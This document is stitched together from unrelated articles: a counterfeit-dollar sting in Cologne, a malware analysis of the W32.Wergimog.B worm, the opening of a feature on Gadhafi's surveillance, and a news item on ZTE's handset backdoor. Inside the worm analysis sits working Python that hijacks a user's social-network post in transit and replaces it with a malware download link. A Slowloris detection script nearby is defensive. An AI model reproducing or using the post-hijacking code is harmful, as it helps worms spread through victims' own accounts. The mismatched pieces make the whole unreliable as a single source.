The Ultimate Counterfeiter Isn’t a Crook—He’s an Artist

Photo: Jaap Scheeren

On a bright May afternoon in 2007, a German artist and printmaker named Hans-Jürgen Kuhl took a seat at an outdoor café directly opposite the colossal facade of the Cologne Cathedral. He ordered an espresso and a slice of plum cake, lit a Lucky Strike, and watched for the buyer. She was due any minute. Kuhl, a lanky 65-year-old, had to remind himself that he was in no rush. He’d sold plenty of artwork over the years, but this batch was altogether different. He needed to be patient.

Tourists milled about the platz in front of the cathedral, Germany’s most visited landmark, craning their necks to snap pictures of the impossibly intricate spires jutting toward the heavens. Kuhl knew those spires well. He had grown up in Cologne and painted the majestic cathedral countless times.

On the other side of a low brick wall surrounding the café, Kuhl finally spotted her. Tall, blond, and trim, Susann Falkenthal looked about 30. As was the case during their previous meetings, she wore practical shoes, an unremarkable blouse and pair of pants, and little makeup. Kuhl thought her plain look was something of a contradiction for a businesswoman who drove a black BMW convertible, but no matter.

When they first met a few months earlier, Falkenthal said she was an events manager from Vilnius, Lithuania, and gave Kuhl a card printed with a Vilnius address as well as an address from the German city of Essen. Her German was flawless.

This appointment by the cathedral was perhaps their 10th, and they greeted each other with a kiss on each cheek. Over the past few months, they had been meeting at Kuhl’s studio. She brought cake; he made coffee. They discussed jazz, Kuhl’s years as a fashion designer, the time Kuhl had met Andy Warhol, vacation spots on the Spanish island of Majorca, and eventually counterfeit US dollars.

If Kuhl couldn’t sell his beautiful fake bills, they would just end up rotting in a storage locker.

Early on, Falkenthal said she did a lot of business with Russian contacts in Vilnius, where unscrupulous types would sometimes try to bribe bouncers with fake $100 bills to gain access to exclusive events organized by her firm. Kuhl sympathized and mentioned a couple of tricks for detecting forgeries. “It’s easy to see and feel if it’s fake or not,” he told her.

A few weeks later, Falkenthal told Kuhl that she had a high-end party coming up in August. Would he be interested in printing the tickets for it? She wanted them to have unique serial numbers and some way to protect against forgeries. Kuhl suggested a strip that shines brightly when exposed to an ultraviolet lamp. Falkenthal told him the official order was for 300 tickets but then with a wink requested he print an extra 50 for her to sell on the side. She obviously isn’t the Pope, Kuhl thought. Working with her might get interesting.

After Kuhl printed the tickets for Falkenthal—including the extra 50—and was paid, he decided to take his chances with her. Not in the romantic sense, although during some of Falkenthal’s visits to his studio, Kuhl certainly noticed the way she’d drape an arm on the back of his desk chair and lean over him to inspect print drafts on his monitor. He thought they could do business. There were risks, Kuhl knew, but he tended to trust people. So he showed her a counterfeit $100 bill that he had made. As a precaution, he told her the sample had come from someone in Poland. There may be many more, he added. She asked if she could borrow it to show to a Russian friend. He said sure but warned her to be cautious. He knew from experience that this “area of business” was full of informants and undercover cops.

Falkenthal called Kuhl two weeks later. Her contact was impressed with the sample and interested in a purchase. They started with a test batch of $250,000, which she bought for 21,600 euros. The price was typical for forgeries, which generally sell at a steep discount because so much of the risk is borne by the buyer. As a consequence, counterfeiting is profitable only on a large scale. During that exchange, Kuhl told Falkenthal that he and his business partner had about $8 million more in currency to sell. “If the contact is satisfied with this first installment, we should talk,” he said. Ten days later she got back to him with good news: The man was “happy with the forgeries” and wanted to make a larger purchase. How about $6.5 million?

Seated at the café across from the cathedral that afternoon, Kuhl handed Falkenthal a note with a price for this new order: 533,000 euros for the $6.5 million in counterfeits. She agreed. Then they decided to make the handoff the next day at his studio. Kuhl also told Falkenthal that to ensure his safety he would have someone nearby during the exchange, just to be sure the handover went smoothly. “I have no choice,” he said, “even though I basically trust you.”

When Kuhl and Falkenthal stood up to part ways, Falkenthal added that she would bring her own boxes. After all, $6.5 million in $100 bills weighs about 150 pounds.

Worm Posts on SNS Sites and Wipes out Rivals

W32.Wergimog is a worm that attempts to spread through removable drives and opens a back door. When I looked into its variants, I found an interesting sample, which I named W32.Wergimog.B. Both samples are based on the same source code, but the .B variant contains even more interesting functionality that I would like to detail here.
 

Injection into legitimate applications

W32.Wergimog.B injects itself into legitimate applications, such as Internet Explorer and Mozilla Firefox, as shown in Figure 1.
 

Figure 1. Threat injects itself into certain applications and then connects to the Internet
 

Once it confirms that the applications it has injected itself into have network connectivity, it performs the functions outlined below.
 

Posting on Social Networking Service (SNS) sites

If a user connects to any of the following SNS sites, the worm is capable of modifying a chat message, status update, or Tweet:

  • Facebook Chat
  • Facebook Wallpost
  • Hi5 Status Update
  • Hyves Status
  • Linkedin Status Update
  • Myspace Status Update
  • Omegle Chat
  • Tweet (Twitter)

Initially, the worm connects to the command-and-control (C&C) server to obtain the content that it posts to the SNS services. At present, we are unable to obtain these posts, but the posting command is called ‘spread’. It is likely, therefore, that the post contains a URL that points to a location where a user might download W32.Wergimog.B or some other malicious program.

This is not the first threat to attempt to spread through SNS sites; W32.Koobface, for example, used the same approach. While the two worms overlap in the sites they target, one difference is that, unlike the Koobface family, W32.Wergimog.B does not open its own connection to the SNS servers. Instead it waits for the user to make a new post from the hooked browser and modifies that post in transit, so the request still travels inside the user's own session.
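As an added illustration (not code from the original write-up, and not recovered from the sample), the following Python models the post-modification step: it inspects an outbound HTTP request from the hooked browser and, only when the request is a form POST to one of the target hosts, replaces the user's text field with the C&C-supplied "spread" content. The host list, the form field names, the spread text and the sample request are all constructed assumptions for the example.

```python
from urllib.parse import parse_qsl, urlencode

# Hosts whose form POSTs are targeted, mapped to the field that carries the
# user's text. These field names are assumptions for the example, not values
# recovered from the W32.Wergimog.B sample.
TARGET_FIELDS = {
    "twitter.com": "status",
    "www.facebook.com": "message",
    "www.linkedin.com": "status",
}


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, version, header pairs, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, path, version, headers, body


def get_header(headers, name):
    """Case-insensitive header lookup over the (name, value) pairs."""
    for k, v in headers:
        if k.lower() == name.lower():
            return v
    return None


def build_request(method, path, version, headers, body: bytes) -> bytes:
    """Reassemble the request, fixing Content-Length to match the new body."""
    fixed = [(k, str(len(body)) if k.lower() == "content-length" else v) for k, v in headers]
    if get_header(fixed, "content-length") is None:
        fixed.append(("Content-Length", str(len(body))))
    head = "\r\n".join([f"{method} {path} {version}"] + [f"{k}: {v}" for k, v in fixed])
    return head.encode("latin-1") + b"\r\n\r\n" + body


def hijack_post(raw: bytes, spread_text: str) -> bytes:
    """Pass the request through unchanged unless it is a form POST to a target
    host that carries the user's text field; then swap that field for the
    C&C-supplied text and return the rebuilt request."""
    method, path, version, headers, body = parse_request(raw)
    field = TARGET_FIELDS.get(get_header(headers, "host") or "")
    ctype = get_header(headers, "content-type") or ""
    if method != "POST" or field is None or not ctype.startswith("application/x-www-form-urlencoded"):
        return raw
    fields = parse_qsl(body.decode("utf-8"), keep_blank_values=True)
    if not any(k == field for k, _ in fields):
        return raw
    new_body = urlencode([(k, spread_text if k == field else v) for k, v in fields]).encode("utf-8")
    return build_request(method, path, version, headers, new_body)


# Constructed sample of what a browser might send for a status update.
SAMPLE_REQUEST = (
    b"POST /statuses/update HTTP/1.1\r\n"
    b"Host: twitter.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 22\r\n"
    b"\r\n"
    b"status=hello+world&x=1"
)
# Stand-in for the content the worm would fetch from its C&C server.
SPREAD_TEXT = "check this out http://example.invalid/update.exe"

if __name__ == "__main__":
    print(hijack_post(SAMPLE_REQUEST, SPREAD_TEXT).decode("latin-1"))
```

Because the rewritten request still carries the user's own cookies and user agent, the SNS server sees an ordinary post from a logged-in account, which is why this approach has a smaller network footprint than a worm that opens its own sessions. Note that Content-Length has to be recomputed once the body changes; a hook that forgets to do so produces malformed requests that fail and draw attention.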
 

Account stealing

Another function of the worm allows it to steal user account and password information if a compromised user logs in to any of the following sites:

  • fileserve.com
  • hackforums.net
  • hotfile.com
  • megaupload.com
  • thepiratebay.org
  • uploading.com

It is interesting to note that some of the above sites are file sharing services. It is possible, therefore, that the stolen account information may be used to spread the worm through these download sites, thereby allowing it to spread even further.
 

Attack on rival threats

An interesting feature of this worm is that it also injects itself into other threats, as shown in Figure 2.
 

Figure 2. Injects itself into rival threats
 

The worm contains lists of rival threat names and signatures to determine if the threats exist on the same computer. The following threats are targeted:

  • DarkComet
  • IRCBot
  • Metus
  • RXBot
  • Warbot
  • xvisceral

The following image illustrates rival threat names and their corresponding signatures.
 

Figure 3. Threat names and corresponding signature “pairs”
 

After infection the worm hooks the computer's network communication. It then matches the traffic against its signatures and ends the processes of any rival threats it identifies, as can be seen in the image below. This is very similar to how an intrusion prevention system (IPS) operates.
 

Figure 4. Wergimog.B kills processes of any rival threats that it finds
 

The targeted threats are very prevalent, so the W32.Wergimog.B author's motive is probably to avoid being discovered and removed along with them: the additional malicious network traffic generated by a rival bot makes it more likely that the user notices an infection and cleans the machine.

We sometimes see a function in a threat that attempts to end the operation of rival threats, but generally speaking such functionality is very simple: a check for a specific file path, process name, or registry entry. By contrast, the method W32.Wergimog.B employs is more reliable, because the signatures are specific to each rival family's traffic, so a rival cannot evade it simply by changing its file path or process name.

In addition, both the original W32.Wergimog and the .B variant carry three denial-of-service (DoS) attack vectors: UDP flooding, SYN flooding, and 'Slowloris'. Slowloris is a DoS tool released in 2009 that had a big impact on web servers. Rather than flooding a target with traffic, it opens many connections and sends partial HTTP request headers slowly, never completing them, so that the server's pool of worker connections is tied up by requests that never finish. It is effective against Apache 1.x and 2.x and some other HTTP servers. It is a little old now but remains popular. W32.Wergimog variants use the same technique, but we do not know what relationship, if any, exists between the original tool and the W32.Wergimog variants.
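The following Python is an added example, not part of the original post or of the Wergimog code, showing the defensive side of the Slowloris technique just described: it replays a constructed stream of connection events, flags connections whose request headers have not been completed within a deadline, and reports sources that hold several such half-open connections. The thresholds, addresses and events are assumptions made for the example.

```python
from collections import defaultdict

HEADER_DEADLINE = 20.0   # seconds a client may take to finish its request headers (assumed)
SLOW_CONN_LIMIT = 2      # half-open connections per source before the source is flagged (assumed)


def track_connections(events):
    """Fold (time, conn_id, src_ip, chunk) events into per-connection state.

    A connection's header block is complete once the blank line (CRLF CRLF)
    has arrived; the time at which that happens is recorded in done_at."""
    conns = {}
    for ts, conn_id, src_ip, chunk in events:
        st = conns.setdefault(conn_id, {"src": src_ip, "start": ts, "buf": b"", "done_at": None})
        if st["done_at"] is None:
            st["buf"] += chunk
            if b"\r\n\r\n" in st["buf"]:
                st["done_at"] = ts
    return conns


def slow_connections(conns, now):
    """Return conn_ids that missed HEADER_DEADLINE, either still open at
    `now` without complete headers or completed only after the deadline."""
    slow = []
    for cid, st in conns.items():
        deadline = st["start"] + HEADER_DEADLINE
        if st["done_at"] is None and now > deadline:
            slow.append(cid)
        elif st["done_at"] is not None and st["done_at"] > deadline:
            slow.append(cid)
    return sorted(slow)


def offending_sources(conns, now):
    """Group slow connections by source IP and return sources at or over SLOW_CONN_LIMIT,
    since a single slow client is a latency problem but many from one source is Slowloris."""
    per_src = defaultdict(int)
    for cid in slow_connections(conns, now):
        per_src[conns[cid]["src"]] += 1
    return sorted(ip for ip, n in per_src.items() if n >= SLOW_CONN_LIMIT)


# Constructed sample: one ordinary client that sends a complete request at once,
# and one Slowloris-style client that opens three connections and trickles a
# bogus header line every 10 s without ever sending the blank line that ends
# the header block.
SAMPLE_EVENTS = [
    (0.0, "c1", "198.51.100.7", b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"),
]
for i, cid in enumerate(("c2", "c3", "c4")):
    SAMPLE_EVENTS.append((0.0 + i, cid, "203.0.113.9", b"GET / HTTP/1.1\r\nHost: example\r\n"))
    for t in (10, 20, 30, 40):
        SAMPLE_EVENTS.append((t + i, cid, "203.0.113.9", b"X-a: b\r\n"))
SAMPLE_EVENTS.sort(key=lambda e: e[0])

if __name__ == "__main__":
    conns = track_connections(SAMPLE_EVENTS)
    print("slow connections:", slow_connections(conns, now=45.0))
    print("offending sources:", offending_sources(conns, now=45.0))
```

The deadline check is the same idea that a server-side request-read timeout enforces: the attack only works while the server is willing to wait indefinitely for headers, so capping that wait, and capping per-source concurrent connections, removes most of its leverage. The trickled header lines keep each connection's byte count rising, which is why the example keys on completion time rather than on idle time alone.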

These two variants first appeared between April and June 2011, and both have continued to be reported through April of this year. To avoid infection by the W32.Wergimog variants, keep your security products and OS updated. We are continuing to watch for developments of the W32.Wergimog worm.

Jamming Tripoli: Inside Moammar Gadhafi’s Secret Surveillance Network

Photo: Michael Christopher Brown

The Internet enabled surveillance on a scale that would have been unimaginable with the old tools of phone taps and informants.

He once was known as al-Jamil—the Handsome One—for his chiseled features and dark curls. But four decades as dictator had considerably dimmed the looks of Moammar Gadhafi. At 68, he now wore a face lined with deep folds, and his lips hung slack, crested with a sparse mustache. When he stepped from the shadows of his presidential palace to greet Ghaida al-Tawati, whom he had summoned that evening by sending one of his hulking female bodyguards to fetch her, it was the first time she had seen him without his trademark sunglasses; his eyes were hooded and rheumy. The dictator was dressed in a white Puma tracksuit and slippers. How tired and thin he looked in person, Tawati thought.

It was February 10, 2011, and Libya was in an uproar. Two months earlier, in neighboring Tunisia, a street vendor named Mohammed Bouazizi had set himself on fire after a policewoman beat him and confiscated his wares. It was the beginning of the Arab Spring, a series of uprisings, revolutions, and civil wars that would radically alter the politics of the Middle East. In Libya, opponents of the Gadhafi regime had called for a day of protest on February 17, to mark the anniversary of a 2006 protest in the city of Benghazi, where security forces had killed 11 demonstrators and wounded dozens more.

Tawati was one of the most outspoken dissidents blogging openly from inside Libya. Thirty-four years old, with a gravelly childlike voice and singsong laugh that belied her deep stubbornness, she had come to political consciousness during the mid-2000s, at a time when Gadhafi, seeking reconciliation with the West, had ceased using his most heavy-handed tactics of repression—such as outright massacres—and allowed a modicum of public dissent. During her university days, when the Internet had begun to ease the country’s isolation, Tawati took naturally to the roles of gadfly and outsider. Her parents had divorced when she was young; in Libya’s deeply conservative culture, growing up with a single mother made her a social outcast. The injustice she experienced as a child led her to critique the injustice of the dictatorial regime, particularly on women’s issues—for example, she blogged about a sexual abuse scandal at a home for unwed mothers institutionalized by the Gadhafi government. Over time she won a modest following online. As the planned protests of February 17 approached, Tawati, always prone to impassioned rhetoric, blogged that if Libyans failed to turn out for the demonstrations she would burn herself just as Bouazizi had done. Somehow Gadhafi himself had heard news of this threat and decided he needed to meet her.

Despite the dictator’s haggard appearance, his manner remained confident and effusive. When he wanted to be, Gadhafi was a legendary charmer, a man deeply at ease with ordinary Libyans. He shook Tawati’s hand and patted her shoulder paternally, directing her to sit next to him on the sofa. He asked her about her health, her family, where she was from. He asked her who had taught her to write. She told him about her demands for greater openness and accountability in Libya, taking care not to criticize him directly. He seemed sympathetic, nodding at various points. Finally she worked up the courage to ask him why the government had blocked YouTube several months earlier.

Gadhafi acted oblivious. “Is it switched off?” he asked.

She complained to him about the way that allies of his regime had treated her. Ever since she’d started blogging under her own name in 2007, Tawati had been harassed—and worse. “Ghaida al-Tawati, the goat of the Internet,” read one Facebook page her attackers created; a string of graphic sexual comments were posted underneath her photo. More bewildering, though, was the invasion of privacy: Somehow, emails of hers had been leaked onto the Internet, even displayed on state television, she told Gadhafi. She had been accused of working with foreign agents. Her reputation as a woman had been smeared.

“If you want to get married,” he interjected, “we’ll get you married to the best man.”

“I’m not interested in getting married,” she replied.

“So, have you made an appointment to burn yourself, then?” Gadhafi asked suddenly, a wry smile curling his lips.

Tawati said that she hadn’t—yet.

“What do you really want from me?” he asked with exasperation.

“You already know the reason why people are demonstrating,” she replied.

Gadhafi’s gaze settled on her for a moment. He asked her to come work for him. The two of them would solve these problems together, he said.

It was an odd show of vulnerability, this bid to co-opt her rather than threaten or crush her. This was the moment, Tawati would later say, that she realized the uprising would succeed. The old man didn’t understand just how committed she and other dissidents were to his downfall. In Libya, as in Egypt and elsewhere, the drive toward revolution drew much of its energy from young, educated activists like Tawati, for whom online tools served as an unprecedented means for communicating and rallying support.

But like Tawati, these activists would suffer greatly at the hands of Gadhafi's spy service, whose own capabilities had been heightened by 21st-century technology. By now, it's well known that the Arab Spring showed the promise of the Internet as a crucible for democratic activism. But, in the shadows, a second narrative unfolded, one that demonstrated the Internet's equal potential for government surveillance and repression on a scale unimaginable with the old analog techniques of phone taps and informants. Today, with Gadhafi dead and a provisional government of former rebels in charge, we can begin to uncover the secret, high-tech spying machine that helped the dictator and his regime cling to power.

Top Handset Maker Confirms Backdoor in One of Its Models

Photo: Pierre Lecourt/Flickr

One of the world’s top handset makers has acknowledged the existence of a backdoor in one of its models.

ZTE, a Chinese manufacturer whose ScoreM handset sells as a Google Android phone, acknowledged that it had shipped the phone with a backdoor account protected by a hardcoded password, which is easily found online. According to Reuters, the company used the backdoor to update the phone's firmware remotely. But anyone else who knows the password can use the same account to gain root access on a ScoreM phone. Because the password is the same on every unit and cannot be changed by the owner, only a firmware update that removes the account closes the hole.

“It could very well be that they’re not very good developers or they could be doing this for nefarious purposes,” Dmitri Alperovitch, co-founder of cybersecurity firm CrowdStrike, told the news service.

ZTE has vowed to fix the security hole.

“ZTE is actively working on a security patch and expects to send the update over-the-air to affected users in the very near future,” ZTE told Reuters. “We strongly urge affected users to download and install the patch as soon as it is rolled out to their devices.”